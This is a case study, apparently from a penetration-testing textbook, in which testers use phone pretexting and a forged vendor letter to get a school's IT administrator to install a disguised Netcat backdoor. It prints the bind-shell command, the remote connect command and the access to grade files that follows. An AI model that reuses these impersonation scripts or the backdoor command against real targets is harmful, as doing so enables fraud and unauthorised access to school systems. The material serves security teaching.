Case Study

In this case study, a penetration tester named Jimmy is hired to perform social engineering against a public elementary school. The goal is to gain access to the school systems to change student grades.

The first step is to find out what type of grading software this school uses. Jimmy begins by doing research on the Internet to find out common grading software. He discovers products like Class Action Gradebook, AutoGrade, Grade Genie, ThinkWave, and Next 5 Grading software. Jimmy also browses educational message boards like the one at familyeducation.com that discuss the use of technology in schools. Exploring the area, Jimmy finds out about a nearby elementary school named Washington Elementary. This knowledge helps Jimmy sound well-informed when making phone calls.

Jimmy calls the school and asks to speak to the person in charge of technology. He is connected with a gentleman named Chris. The conversation goes as follows:

Jimmy: Hello, Chris? My name is Jimmy, and I am over at Washington Elementary. I just got assigned responsibility over our technology over here, but, to be honest, I do not know much about technology, so I was wondering if you could help me.

At this point Jimmy has established the need. Because people generally like to help others, Jimmy knows that Chris would probably be happy to help.

Chris: Hi, Jimmy. So you are over at Washington, huh? What happened to Kathy? I thought she was in charge of technology over there.

Jimmy: Yeah, she still oversees the management, but now they are expanding her role. I work directly under her. She is a great person to work for.

Although it appears as if Jimmy might have gotten caught, he plays it off by saying Kathy has been promoted. Jimmy also appeals to Chris by saying something positive about Kathy to make the conversation lighthearted.

Jimmy: Anyway, Kathy has asked me to come up with some new grading software. I have been looking at Gradebook, AutoGrade, and Grade Genie, but I am not sure which is the most flexible. Which one do you guys use?

Jimmy demonstrated his knowledge of grading software to remove any doubts of his background in education. Jimmy also asks Chris which software is the most flexible because the message boards he looked at make that the top priority in searching for grading software.

Chris: We have been using Gradebook. We are pretty happy with it.

From this point, Jimmy proceeds to ask questions about the software based on similar questions he read on message boards.

When the conversation is over, Jimmy now knows the type of software used by the school and that the name of the person in charge of technology is Chris.

For the next phase, Jimmy chooses someone else to contact Chris because he would recognize the voice of Jimmy. Because Chris is a man, and because the best social engineering scenarios are with people of the opposite sex, Jimmy asks his coworker Janet to make a phone call and act like a support representative at ThinkWave. Janet waits a couple of weeks before contacting Chris so that it does not appear too conspicuous.

Janet: Hello, Chris? I am Janet with ThinkWave Technology. We were wondering if you would like to participate in our customer improvement program. As an incentive, you receive 20 percent discounts on future upgrades.

Because most public schools are struggling for money, it is a safe assumption that Chris would be motivated by saving money.

Chris: Sure. What do I have to do?

Janet: Well, I will send you reporting software to put on your server. Included with this will be instructions on how to configure it. Any time an error message appears, a report is generated and sent back to us. No personal information is sent, just the type of computer, when it happened, and what processes were running when the error occurred. By collecting these reports from our customers, we hope to alleviate bugs in future software releases.

Chris: Sounds good!

After this conversation, Jimmy downloads the ThinkWave logo off of its website and creates letterhead stationary with the logo. Jimmy looks up the company address and sends a package to Chris with a return address of ThinkWave. The package contains a CD with the Netcat utility and a letter that says the following:

Dear Chris,

Thank you for your participation in our customer improvement program. We are certain your assistance will help us improve future releases of our product. Included with this letter is a CD that contains reporting software. Any time an error occurs, a report will be generated and sent back to us. I want to assure you that no personal data will be sent.

To start up this reporting program, pop the CD into the CD-ROM drive of your server. It should automatically start the setup program. If not, go to the root of the CD-ROM drive and start setup.exe.

This reporting software uses TCP port 1753. You will need to open this port on your firewall. Consult your firewall documentation on how to permit this port.

By enrolling in this program, you will automatically receive 20 percent off future upgrades. We appreciate your continued business and look forward to serving you in the future.

          Sincerely,
          Janet Smith
          Support Representative
          ThinkWave
          "Where teachers, students, and parents communicate"

On the CD is a setup utility that Jimmy created that installs Netcat onto the root of the server hard drive. Netcat is a backdoor Trojan application that provides Jimmy with remote access into the server. The install script starts Netcat with the following parameters:

C:\nc -l -p 1753 -t -e cmd.exe

The l tells Netcat to go into listening mode. The p 1753 tells Netcat to listen on port 1753. The t tells Netcat to listen for Telnet requests, and e cmd.exe tells Netcat to open a command shell.

After a couple of days, Jimmy has Janet call Chris back.

Janet: This is Janet. I am just calling to see if you had any problems installing our reporting software.

Chris: Nope, none at all.

Janet: Wonderful. That is what we like to hear. Now we just need to know your external IP address so that when we receive the reports, we know it is coming from you.

Chris: Sure. Let me check. Okay, it should be 200.100.50.25.

Janet: Thanks! If you ever need anything, do not hesitate to call us. Do you have our support number?

Chris: Yes, I think I do.

Jimmy had already looked up the phone number so that Janet could offer it to appear helpful and more legitimate to Chris.

Now it is time to attempt access. Jimmy goes to his computer and types the following:

C:\nc 200.100.50.25 1753

This command attempts to open a connection to the school server on port 1753. Sure enough, when Jimmy checks his screen, he has gained access into the server. He executes a directory listing to make sure:

C:\dir C:\>dir  Volume in drive C has no label.  Volume Serial Number is 8496-8025  Directory of C:\ 06/01/2004 04:11 PM    <DIR>      ThinkWave 04/14/2004 03:11 PM    <DIR       WINNT 04/14/2004 07:43 AM               0 AUTOEXEC.BAT <output removed>

Now Jimmy has full access to the school server. He begins to navigate to the grading software and copies the data to his local computer. Jimmy logs the entire process and captures screenshots to add to his report later.

Jimmy looks at one of the files named 010521.edt using a text editor and discovers that it is the grade file for a student:

010521   Spelling             A 010521   Mathematics          B 010521   Physical Education   A

With only a couple of phone calls and a quick command, Jimmy was able to gain access to the school server, where all student grades were located.